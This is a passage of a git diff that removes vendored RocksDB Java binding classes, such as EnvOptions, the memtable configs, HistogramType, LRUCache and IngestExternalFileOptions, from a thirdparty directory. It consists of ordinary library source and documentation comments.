-  public long compactionReadaheadSize() {
-    assert(isOwningHandle());
-    return compactionReadaheadSize(nativeHandle_);
-  }
-
-  public EnvOptions setRandomAccessMaxBufferSize(final long randomAccessMaxBufferSize) {
-    setRandomAccessMaxBufferSize(nativeHandle_, randomAccessMaxBufferSize);
-    return this;
-  }
-
-  public long randomAccessMaxBufferSize() {
-    assert(isOwningHandle());
-    return randomAccessMaxBufferSize(nativeHandle_);
-  }
-
-  public EnvOptions setWritableFileMaxBufferSize(final long writableFileMaxBufferSize) {
-    setWritableFileMaxBufferSize(nativeHandle_, writableFileMaxBufferSize);
-    return this;
-  }
-
-  public long writableFileMaxBufferSize() {
-    assert(isOwningHandle());
-    return writableFileMaxBufferSize(nativeHandle_);
-  }
-
-  public EnvOptions setRateLimiter(final RateLimiter rateLimiter) {
-    this.rateLimiter = rateLimiter;
-    setRateLimiter(nativeHandle_, rateLimiter.nativeHandle_);
-    return this;
-  }
-
-  public RateLimiter rateLimiter() {
-    assert(isOwningHandle());
-    return rateLimiter;
-  }
-
-  private native static long newEnvOptions();
-
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native void setUseOsBuffer(final long handle, final boolean useOsBuffer);
-
-  private native boolean useOsBuffer(final long handle);
-
-  private native void setUseMmapReads(final long handle, final boolean useMmapReads);
-
-  private native boolean useMmapReads(final long handle);
-
-  private native void setUseMmapWrites(final long handle, final boolean useMmapWrites);
-
-  private native boolean useMmapWrites(final long handle);
-
-  private native void setUseDirectReads(final long handle, final boolean useDirectReads);
-
-  private native boolean useDirectReads(final long handle);
-
-  private native void setUseDirectWrites(final long handle, final boolean useDirectWrites);
-
-  private native boolean useDirectWrites(final long handle);
-
-  private native void setAllowFallocate(final long handle, final boolean allowFallocate);
-
-  private native boolean allowFallocate(final long handle);
-
-  private native void setSetFdCloexec(final long handle, final boolean setFdCloexec);
-
-  private native boolean setFdCloexec(final long handle);
-
-  private native void setBytesPerSync(final long handle, final long bytesPerSync);
-
-  private native long bytesPerSync(final long handle);
-
-  private native void setFallocateWithKeepSize(
-      final long handle, final boolean fallocateWithKeepSize);
-
-  private native boolean fallocateWithKeepSize(final long handle);
-
-  private native void setCompactionReadaheadSize(
-      final long handle, final long compactionReadaheadSize);
-
-  private native long compactionReadaheadSize(final long handle);
-
-  private native void setRandomAccessMaxBufferSize(
-      final long handle, final long randomAccessMaxBufferSize);
-
-  private native long randomAccessMaxBufferSize(final long handle);
-
-  private native void setWritableFileMaxBufferSize(
-      final long handle, final long writableFileMaxBufferSize);
-
-  private native long writableFileMaxBufferSize(final long handle);
-
-  private native void setRateLimiter(final long handle, final long rateLimiterHandle);
-
-  private RateLimiter rateLimiter;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Experimental.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Experimental.java
deleted file mode 100644
index 64b404d..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Experimental.java
+++ /dev/null
@@ -1,23 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.lang.annotation.ElementType;
-import java.lang.annotation.Documented;
-import java.lang.annotation.Retention;
-import java.lang.annotation.RetentionPolicy;
-import java.lang.annotation.Target;
-
-/**
- * Marks a feature as experimental, meaning that it is likely
- * to change or even be removed/re-engineered in the future
- */
-@Documented
-@Retention(RetentionPolicy.SOURCE)
-@Target({ElementType.TYPE, ElementType.METHOD})
-public @interface Experimental {
-  String value();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Filter.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Filter.java
deleted file mode 100644
index 011be20..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Filter.java
+++ /dev/null
@@ -1,35 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Filters are stored in rocksdb and are consulted automatically
- * by rocksdb to decide whether or not to read some
- * information from disk. In many cases, a filter can cut down the
- * number of disk seeks form a handful to a single disk seek per
- * DB::Get() call.
- */
-public abstract class Filter extends RocksObject {
-
-  protected Filter(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  /**
-   * Deletes underlying C++ filter pointer.
-   *
-   * Note that this function should be called only after all
-   * RocksDB instances referencing the filter are closed.
-   * Otherwise an undefined behavior will occur.
-   */
-  @Override
-  protected void disposeInternal() {
-    disposeInternal(nativeHandle_);
-  }
-
-  @Override
-  protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/FlushOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/FlushOptions.java
deleted file mode 100644
index ce54a52..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/FlushOptions.java
+++ /dev/null
@@ -1,49 +0,0 @@
-package org.rocksdb;
-
-/**
- * FlushOptions to be passed to flush operations of
- * {@link org.rocksdb.RocksDB}.
- */
-public class FlushOptions extends RocksObject {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  /**
-   * Construct a new instance of FlushOptions.
-   */
-  public FlushOptions(){
-    super(newFlushOptions());
-  }
-
-  /**
-   * Set if the flush operation shall block until it terminates.
-   *
-   * @param waitForFlush boolean value indicating if the flush
-   *     operations waits for termination of the flush process.
-   *
-   * @return instance of current FlushOptions.
-   */
-  public FlushOptions setWaitForFlush(final boolean waitForFlush) {
-    assert(isOwningHandle());
-    setWaitForFlush(nativeHandle_, waitForFlush);
-    return this;
-  }
-
-  /**
-   * Wait for flush to finished.
-   *
-   * @return boolean value indicating if the flush operation
-   *     waits for termination of the flush process.
-   */
-  public boolean waitForFlush() {
-    assert(isOwningHandle());
-    return waitForFlush(nativeHandle_);
-  }
-
-  private native static long newFlushOptions();
-  @Override protected final native void disposeInternal(final long handle);
-  private native void setWaitForFlush(long handle,
-      boolean wait);
-  private native boolean waitForFlush(long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HashLinkedListMemTableConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HashLinkedListMemTableConfig.java
deleted file mode 100644
index d56c46c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HashLinkedListMemTableConfig.java
+++ /dev/null
@@ -1,173 +0,0 @@
-package org.rocksdb;
-
-/**
- * The config for hash linked list memtable representation
- * Such memtable contains a fix-sized array of buckets, where
- * each bucket points to a sorted singly-linked
- * list (or null if the bucket is empty).
- *
- * Note that since this mem-table representation relies on the
- * key prefix, it is required to invoke one of the usePrefixExtractor
- * functions to specify how to extract key prefix given a key.
- * If proper prefix-extractor is not set, then RocksDB will
- * use the default memtable representation (SkipList) instead
- * and post a warning in the LOG.
- */
-public class HashLinkedListMemTableConfig extends MemTableConfig {
-  public static final long DEFAULT_BUCKET_COUNT = 50000;
-  public static final long DEFAULT_HUGE_PAGE_TLB_SIZE = 0;
-  public static final int DEFAULT_BUCKET_ENTRIES_LOG_THRES = 4096;
-  public static final boolean
-      DEFAULT_IF_LOG_BUCKET_DIST_WHEN_FLUSH = true;
-  public static final int DEFAUL_THRESHOLD_USE_SKIPLIST = 256;
-
-  /**
-   * HashLinkedListMemTableConfig constructor
-   */
-  public HashLinkedListMemTableConfig() {
-    bucketCount_ = DEFAULT_BUCKET_COUNT;
-    hugePageTlbSize_ = DEFAULT_HUGE_PAGE_TLB_SIZE;
-    bucketEntriesLoggingThreshold_ = DEFAULT_BUCKET_ENTRIES_LOG_THRES;
-    ifLogBucketDistWhenFlush_ = DEFAULT_IF_LOG_BUCKET_DIST_WHEN_FLUSH;
-    thresholdUseSkiplist_ = DEFAUL_THRESHOLD_USE_SKIPLIST;
-  }
-
-  /**
-   * Set the number of buckets in the fixed-size array used
-   * in the hash linked-list mem-table.
-   *
-   * @param count the number of hash buckets.
-   * @return the reference to the current HashLinkedListMemTableConfig.
-   */
-  public HashLinkedListMemTableConfig setBucketCount(
-      final long count) {
-    bucketCount_ = count;
-    return this;
-  }
-
-  /**
-   * Returns the number of buckets that will be used in the memtable
-   * created based on this config.
-   *
-   * @return the number of buckets
-   */
-  public long bucketCount() {
-    return bucketCount_;
-  }
-
-  /**
-   * <p>Set the size of huge tlb or allocate the hashtable bytes from
-   * malloc if {@code size <= 0}.</p>
-   *
-   * <p>The user needs to reserve huge pages for it to be allocated,
-   * like: {@code sysctl -w vm.nr_hugepages=20}</p>
-   *
-   * <p>See linux documentation/vm/hugetlbpage.txt</p>
-   *
-   * @param size if set to {@code <= 0} hashtable bytes from malloc
-   * @return the reference to the current HashLinkedListMemTableConfig.
-   */
-  public HashLinkedListMemTableConfig setHugePageTlbSize(
-      final long size) {
-    hugePageTlbSize_ = size;
-    return this;
-  }
-
-  /**
-   * Returns the size value of hugePageTlbSize.
-   *
-   * @return the hugePageTlbSize.
-   */
-  public long hugePageTlbSize() {
-    return hugePageTlbSize_;
-  }
-
-  /**
-   * If number of entries in one bucket exceeds that setting, log
-   * about it.
-   *
-   * @param threshold - number of entries in a single bucket before
-   *     logging starts.
-   * @return the reference to the current HashLinkedListMemTableConfig.
-   */
-  public HashLinkedListMemTableConfig
-      setBucketEntriesLoggingThreshold(final int threshold) {
-    bucketEntriesLoggingThreshold_ = threshold;
-    return this;
-  }
-
-  /**
-   * Returns the maximum number of entries in one bucket before
-   * logging starts.
-   *
-   * @return maximum number of entries in one bucket before logging
-   *     starts.
-   */
-  public int bucketEntriesLoggingThreshold() {
-    return bucketEntriesLoggingThreshold_;
-  }
-
-  /**
-   * If true the distrubition of number of entries will be logged.
-   *
-   * @param logDistribution - boolean parameter indicating if number
-   *     of entry distribution shall be logged.
-   * @return the reference to the current HashLinkedListMemTableConfig.
-   */
-  public HashLinkedListMemTableConfig
-      setIfLogBucketDistWhenFlush(final boolean logDistribution) {
-    ifLogBucketDistWhenFlush_ = logDistribution;
-    return this;
-  }
-
-  /**
-   * Returns information about logging the distribution of
-   *  number of entries on flush.
-   *
-   * @return if distrubtion of number of entries shall be logged.
-   */
-  public boolean ifLogBucketDistWhenFlush() {
-    return ifLogBucketDistWhenFlush_;
-  }
-
-  /**
-   * Set maximum number of entries in one bucket. Exceeding this val
-   * leads to a switch from LinkedList to SkipList.
-   *
-   * @param threshold maximum number of entries before SkipList is
-   *     used.
-   * @return the reference to the current HashLinkedListMemTableConfig.
-   */
-  public HashLinkedListMemTableConfig
-      setThresholdUseSkiplist(final int threshold) {
-    thresholdUseSkiplist_ = threshold;
-    return this;
-  }
-
-  /**
-   * Returns entries per bucket threshold before LinkedList is
-   * replaced by SkipList usage for that bucket.
-   *
-   * @return entries per bucket threshold before SkipList is used.
-   */
-  public int thresholdUseSkiplist() {
-    return thresholdUseSkiplist_;
-  }
-
-  @Override protected long newMemTableFactoryHandle() {
-    return newMemTableFactoryHandle(bucketCount_, hugePageTlbSize_,
-        bucketEntriesLoggingThreshold_, ifLogBucketDistWhenFlush_,
-        thresholdUseSkiplist_);
-  }
-
-  private native long newMemTableFactoryHandle(long bucketCount,
-      long hugePageTlbSize, int bucketEntriesLoggingThreshold,
-      boolean ifLogBucketDistWhenFlush, int thresholdUseSkiplist)
-      throws IllegalArgumentException;
-
-  private long bucketCount_;
-  private long hugePageTlbSize_;
-  private int bucketEntriesLoggingThreshold_;
-  private boolean ifLogBucketDistWhenFlush_;
-  private int thresholdUseSkiplist_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HashSkipListMemTableConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HashSkipListMemTableConfig.java
deleted file mode 100644
index fe1779b..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HashSkipListMemTableConfig.java
+++ /dev/null
@@ -1,105 +0,0 @@
-package org.rocksdb;
-
-/**
- * The config for hash skip-list mem-table representation.
- * Such mem-table representation contains a fix-sized array of
- * buckets, where each bucket points to a skiplist (or null if the
- * bucket is empty).
- *
- * Note that since this mem-table representation relies on the
- * key prefix, it is required to invoke one of the usePrefixExtractor
- * functions to specify how to extract key prefix given a key.
- * If proper prefix-extractor is not set, then RocksDB will
- * use the default memtable representation (SkipList) instead
- * and post a warning in the LOG.
- */
-public class HashSkipListMemTableConfig extends MemTableConfig {
-  public static final int DEFAULT_BUCKET_COUNT = 1000000;
-  public static final int DEFAULT_BRANCHING_FACTOR = 4;
-  public static final int DEFAULT_HEIGHT = 4;
-
-  /**
-   * HashSkipListMemTableConfig constructor
-   */
-  public HashSkipListMemTableConfig() {
-    bucketCount_ = DEFAULT_BUCKET_COUNT;
-    branchingFactor_ = DEFAULT_BRANCHING_FACTOR;
-    height_ = DEFAULT_HEIGHT;
-  }
-
-  /**
-   * Set the number of hash buckets used in the hash skiplist memtable.
-   * Default = 1000000.
-   *
-   * @param count the number of hash buckets used in the hash
-   *    skiplist memtable.
-   * @return the reference to the current HashSkipListMemTableConfig.
-   */
-  public HashSkipListMemTableConfig setBucketCount(
-      final long count) {
-    bucketCount_ = count;
-    return this;
-  }
-
-  /**
-   * @return the number of hash buckets
-   */
-  public long bucketCount() {
-    return bucketCount_;
-  }
-
-  /**
-   * Set the height of the skip list.  Default = 4.
-   *
-   * @param height height to set.
-   *
-   * @return the reference to the current HashSkipListMemTableConfig.
-   */
-  public HashSkipListMemTableConfig setHeight(final int height) {
-    height_ = height;
-    return this;
-  }
-
-  /**
-   * @return the height of the skip list.
-   */
-  public int height() {
-    return height_;
-  }
-
-  /**
-   * Set the branching factor used in the hash skip-list memtable.
-   * This factor controls the probabilistic size ratio between adjacent
-   * links in the skip list.
-   *
-   * @param bf the probabilistic size ratio between adjacent link
-   *     lists in the skip list.
-   * @return the reference to the current HashSkipListMemTableConfig.
-   */
-  public HashSkipListMemTableConfig setBranchingFactor(
-      final int bf) {
-    branchingFactor_ = bf;
-    return this;
-  }
-
-  /**
-   * @return branching factor, the probabilistic size ratio between
-   *     adjacent links in the skip list.
-   */
-  public int branchingFactor() {
-    return branchingFactor_;
-  }
-
-  @Override protected long newMemTableFactoryHandle() {
-    return newMemTableFactoryHandle(
-        bucketCount_, height_, branchingFactor_);
-  }
-
-  private native long newMemTableFactoryHandle(
-      long bucketCount, int height, int branchingFactor)
-      throws IllegalArgumentException;
-
-  private long bucketCount_;
-  private int branchingFactor_;
-  private int height_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HistogramData.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HistogramData.java
deleted file mode 100644
index 11798eb..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HistogramData.java
+++ /dev/null
@@ -1,44 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public class HistogramData {
-  private final double median_;
-  private final double percentile95_;
-  private final double percentile99_;
-  private final double average_;
-  private final double standardDeviation_;
-
-  public HistogramData(final double median, final double percentile95,
-      final double percentile99, final double average,
-      final double standardDeviation) {
-    median_ = median;
-    percentile95_ = percentile95;
-    percentile99_ = percentile99;
-    average_ = average;
-    standardDeviation_ = standardDeviation;
-  }
-
-  public double getMedian() {
-    return median_;
-  }
-
-  public double getPercentile95() {
-    return percentile95_;
-  }
-
-  public double getPercentile99() {
-    return percentile99_;
-  }
-
-  public double getAverage() {
-    return average_;
-  }
-
-  public double getStandardDeviation() {
-    return standardDeviation_;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HistogramType.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HistogramType.java
deleted file mode 100644
index 2d95f51..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HistogramType.java
+++ /dev/null
@@ -1,98 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public enum HistogramType {
-
-  DB_GET((byte) 0x0),
-
-  DB_WRITE((byte) 0x1),
-
-  COMPACTION_TIME((byte) 0x2),
-
-  SUBCOMPACTION_SETUP_TIME((byte) 0x3),
-
-  TABLE_SYNC_MICROS((byte) 0x4),
-
-  COMPACTION_OUTFILE_SYNC_MICROS((byte) 0x5),
-
-  WAL_FILE_SYNC_MICROS((byte) 0x6),
-
-  MANIFEST_FILE_SYNC_MICROS((byte) 0x7),
-
-  /**
-   * TIME SPENT IN IO DURING TABLE OPEN.
-   */
-  TABLE_OPEN_IO_MICROS((byte) 0x8),
-
-  DB_MULTIGET((byte) 0x9),
-
-  READ_BLOCK_COMPACTION_MICROS((byte) 0xA),
-
-  READ_BLOCK_GET_MICROS((byte) 0xB),
-
-  WRITE_RAW_BLOCK_MICROS((byte) 0xC),
-
-  STALL_L0_SLOWDOWN_COUNT((byte) 0xD),
-
-  STALL_MEMTABLE_COMPACTION_COUNT((byte) 0xE),
-
-  STALL_L0_NUM_FILES_COUNT((byte) 0xF),
-
-  HARD_RATE_LIMIT_DELAY_COUNT((byte) 0x10),
-
-  SOFT_RATE_LIMIT_DELAY_COUNT((byte) 0x11),
-
-  NUM_FILES_IN_SINGLE_COMPACTION((byte) 0x12),
-
-  DB_SEEK((byte) 0x13),
-
-  WRITE_STALL((byte) 0x14),
-
-  SST_READ_MICROS((byte) 0x15),
-
-  /**
-   * The number of subcompactions actually scheduled during a compaction.
-   */
-  NUM_SUBCOMPACTIONS_SCHEDULED((byte) 0x16),
-
-  /**
-   * Value size distribution in each operation.
-   */
-  BYTES_PER_READ((byte) 0x17),
-  BYTES_PER_WRITE((byte) 0x18),
-  BYTES_PER_MULTIGET((byte) 0x19),
-
-  /**
-   * number of bytes compressed.
-   */
-  BYTES_COMPRESSED((byte) 0x1A),
-
-  /**
-   * number of bytes decompressed.
-   *
-   * number of bytes is when uncompressed; i.e. before/after respectively
-   */
-  BYTES_DECOMPRESSED((byte) 0x1B),
-
-  COMPRESSION_TIMES_NANOS((byte) 0x1C),
-
-  DECOMPRESSION_TIMES_NANOS((byte) 0x1D),
-
-  READ_NUM_MERGE_OPERANDS((byte) 0x1E),
-
-  HISTOGRAM_ENUM_MAX((byte) 0x1F);
-
-  private final byte value;
-
-  HistogramType(final byte value) {
-    this.value = value;
-  }
-
-  public byte getValue() {
-    return value;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/IndexType.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/IndexType.java
deleted file mode 100644
index e0c113d..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/IndexType.java
+++ /dev/null
@@ -1,41 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * IndexType used in conjunction with BlockBasedTable.
- */
-public enum IndexType {
-  /**
-   * A space efficient index block that is optimized for
-   * binary-search-based index.
-   */
-  kBinarySearch((byte) 0),
-  /**
-   * The hash index, if enabled, will do the hash lookup when
-   * {@code Options.prefix_extractor} is provided.
-   */
-  kHashSearch((byte) 1),
-  /**
-   * A two-level index implementation. Both levels are binary search indexes.
-   */
-  kTwoLevelIndexSearch((byte) 2);
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value_;
-  }
-
-  private IndexType(byte value) {
-    value_ = value;
-  }
-
-  private final byte value_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/InfoLogLevel.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/InfoLogLevel.java
deleted file mode 100644
index 2c97991..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/InfoLogLevel.java
+++ /dev/null
@@ -1,48 +0,0 @@
-package org.rocksdb;
-
-/**
- * RocksDB log levels.
- */
-public enum InfoLogLevel {
-  DEBUG_LEVEL((byte)0),
-  INFO_LEVEL((byte)1),
-  WARN_LEVEL((byte)2),
-  ERROR_LEVEL((byte)3),
-  FATAL_LEVEL((byte)4),
-  HEADER_LEVEL((byte)5),
-  NUM_INFO_LOG_LEVELS((byte)6);
-
-  private final byte value_;
-
-  private InfoLogLevel(final byte value) {
-    value_ = value;
-  }
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value_;
-  }
-
-  /**
-   * Get InfoLogLevel by byte value.
-   *
-   * @param value byte representation of InfoLogLevel.
-   *
-   * @return {@link org.rocksdb.InfoLogLevel} instance.
-   * @throws java.lang.IllegalArgumentException if an invalid
-   *     value is provided.
-   */
-  public static InfoLogLevel getInfoLogLevel(final byte value) {
-    for (final InfoLogLevel infoLogLevel : InfoLogLevel.values()) {
-      if (infoLogLevel.getValue() == value){
-        return infoLogLevel;
-      }
-    }
-    throw new IllegalArgumentException(
-        "Illegal value provided for InfoLogLevel.");
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/IngestExternalFileOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/IngestExternalFileOptions.java
deleted file mode 100644
index 7343691..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/IngestExternalFileOptions.java
+++ /dev/null
@@ -1,125 +0,0 @@
-package org.rocksdb;
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-import java.util.List;
-
-/**
- * IngestExternalFileOptions is used by {@link RocksDB#ingestExternalFile(ColumnFamilyHandle, List, IngestExternalFileOptions)}
- */
-public class IngestExternalFileOptions extends RocksObject {
-
-  public IngestExternalFileOptions() {
-    super(newIngestExternalFileOptions());
-  }
-
-  /**
-   * @param moveFiles {@link #setMoveFiles(boolean)}
-   * @param snapshotConsistency {@link #setSnapshotConsistency(boolean)}
-   * @param allowGlobalSeqNo {@link #setAllowGlobalSeqNo(boolean)}
-   * @param allowBlockingFlush {@link #setAllowBlockingFlush(boolean)}
-   */
-  public IngestExternalFileOptions(final boolean moveFiles,
-      final boolean snapshotConsistency, final boolean allowGlobalSeqNo,
-      final boolean allowBlockingFlush) {
-    super(newIngestExternalFileOptions(moveFiles, snapshotConsistency,
-        allowGlobalSeqNo, allowBlockingFlush));
-  }
-
-  /**
-   * Can be set to true to move the files instead of copying them.
-   *
-   * @return true if files will be moved
-   */
-  public boolean moveFiles() {
-    return moveFiles(nativeHandle_);
-  }
-
-  /**
-   * Can be set to true to move the files instead of copying them.
-   *
-   * @param moveFiles true if files should be moved instead of copied
-   */
-  public void setMoveFiles(final boolean moveFiles) {
-    setMoveFiles(nativeHandle_, moveFiles);
-  }
-
-  /**
-   * If set to false, an ingested file keys could appear in existing snapshots
-   * that where created before the file was ingested.
-   *
-   * @return true if snapshot consistency is assured
-   */
-  public boolean snapshotConsistency() {
-    return snapshotConsistency(nativeHandle_);
-  }
-
-  /**
-   * If set to false, an ingested file keys could appear in existing snapshots
-   * that where created before the file was ingested.
-   *
-   * @param snapshotConsistency true if snapshot consistency is required
-   */
-  public void setSnapshotConsistency(final boolean snapshotConsistency) {
-    setSnapshotConsistency(nativeHandle_, snapshotConsistency);
-  }
-
-  /**
-   * If set to false, {@link RocksDB#ingestExternalFile(ColumnFamilyHandle, List, IngestExternalFileOptions)}
-   * will fail if the file key range overlaps with existing keys or tombstones in the DB.
-   *
-   * @return true if global seq numbers are assured
-   */
-  public boolean allowGlobalSeqNo() {
-    return allowGlobalSeqNo(nativeHandle_);
-  }
-
-  /**
-   * If set to false, {@link RocksDB#ingestExternalFile(ColumnFamilyHandle, List, IngestExternalFileOptions)}
-   * will fail if the file key range overlaps with existing keys or tombstones in the DB.
-   *
-   * @param allowGlobalSeqNo true if global seq numbers are required
-   */
-  public void setAllowGlobalSeqNo(final boolean allowGlobalSeqNo) {
-    setAllowGlobalSeqNo(nativeHandle_, allowGlobalSeqNo);
-  }
-
-  /**
-   * If set to false and the file key range overlaps with the memtable key range
-   * (memtable flush required), IngestExternalFile will fail.
-   *
-   * @return true if blocking flushes may occur
-   */
-  public boolean allowBlockingFlush() {
-    return allowBlockingFlush(nativeHandle_);
-  }
-
-  /**
-   * If set to false and the file key range overlaps with the memtable key range
-   * (memtable flush required), IngestExternalFile will fail.
-   *
-   * @param allowBlockingFlush true if blocking flushes are allowed
-   */
-  public void setAllowBlockingFlush(final boolean allowBlockingFlush) {
-    setAllowBlockingFlush(nativeHandle_, allowBlockingFlush);
-  }
-
-  private native static long newIngestExternalFileOptions();
-  private native static long newIngestExternalFileOptions(
-      final boolean moveFiles, final boolean snapshotConsistency,
-      final boolean allowGlobalSeqNo, final boolean allowBlockingFlush);
-  private native boolean moveFiles(final long handle);
-  private native void setMoveFiles(final long handle, final boolean move_files);
-  private native boolean snapshotConsistency(final long handle);
-  private native void setSnapshotConsistency(final long handle,
-      final boolean snapshotConsistency);
-  private native boolean allowGlobalSeqNo(final long handle);
-  private native void setAllowGlobalSeqNo(final long handle,
-      final boolean allowGloablSeqNo);
-  private native boolean allowBlockingFlush(final long handle);
-  private native void setAllowBlockingFlush(final long handle,
-      final boolean allowBlockingFlush);
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/LRUCache.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/LRUCache.java
deleted file mode 100644
index 5e5bdee..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/LRUCache.java
+++ /dev/null
@@ -1,82 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Least Recently Used Cache
- */
-public class LRUCache extends Cache {
-
-  /**
-   * Create a new cache with a fixed size capacity
-   *
-   * @param capacity The fixed size capacity of the cache
-   */
-  public LRUCache(final long capacity) {
-    this(capacity, -1, false, 0.0);
-  }
-
-  /**
-   * Create a new cache with a fixed size capacity. The cache is sharded
-   * to 2^numShardBits shards, by hash of the key. The total capacity
-   * is divided and evenly assigned to each shard.
-   * numShardBits = -1 means it is automatically determined: every shard
-   * will be at least 512KB and number of shard bits will not exceed 6.
-   *
-   * @param capacity The fixed size capacity of the cache
-   * @param numShardBits The cache is sharded to 2^numShardBits shards,
-   *     by hash of the key
-   */
-  public LRUCache(final long capacity, final int numShardBits) {
-    super(newLRUCache(capacity, numShardBits, false,0.0));
-  }
-
-  /**
-   * Create a new cache with a fixed size capacity. The cache is sharded
-   * to 2^numShardBits shards, by hash of the key. The total capacity
-   * is divided and evenly assigned to each shard. If strictCapacityLimit
-   * is set, insert to the cache will fail when cache is full.
-   * numShardBits = -1 means it is automatically determined: every shard
-   * will be at least 512KB and number of shard bits will not exceed 6.
-   *
-   * @param capacity The fixed size capacity of the cache
-   * @param numShardBits The cache is sharded to 2^numShardBits shards,
-   *     by hash of the key
-   * @param strictCapacityLimit insert to the cache will fail when cache is full
-   */
-  public LRUCache(final long capacity, final int numShardBits,
-                  final boolean strictCapacityLimit) {
-    super(newLRUCache(capacity, numShardBits, strictCapacityLimit,0.0));
-  }
-
-  /**
-   * Create a new cache with a fixed size capacity. The cache is sharded
-   * to 2^numShardBits shards, by hash of the key. The total capacity
-   * is divided and evenly assigned to each shard. If strictCapacityLimit
-   * is set, insert to the cache will fail when cache is full. User can also
-   * set percentage of the cache reserves for high priority entries via
-   * highPriPoolRatio.
-   * numShardBits = -1 means it is automatically determined: every shard
-   * will be at least 512KB and number of shard bits will not exceed 6.
-   *
-   * @param capacity The fixed size capacity of the cache
-   * @param numShardBits The cache is sharded to 2^numShardBits shards,
-   *     by hash of the key
-   * @param strictCapacityLimit insert to the cache will fail when cache is full
-   * @param highPriPoolRatio percentage of the cache reserves for high priority
-   *     entries
-   */
-  public LRUCache(final long capacity, final int numShardBits,
-      final boolean strictCapacityLimit, final double highPriPoolRatio) {
-    super(newLRUCache(capacity, numShardBits, strictCapacityLimit,
-        highPriPoolRatio));
-  }
-
-  private native static long newLRUCache(final long capacity,
-      final int numShardBits, final boolean strictCapacityLimit,
-      final double highPriPoolRatio);
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Logger.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Logger.java
deleted file mode 100644
index 9021259..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Logger.java
+++ /dev/null
@@ -1,111 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * <p>This class provides a custom logger functionality
- * in Java which wraps {@code RocksDB} logging facilities.
- * </p>
- *
- * <p>Using this class RocksDB can log with common
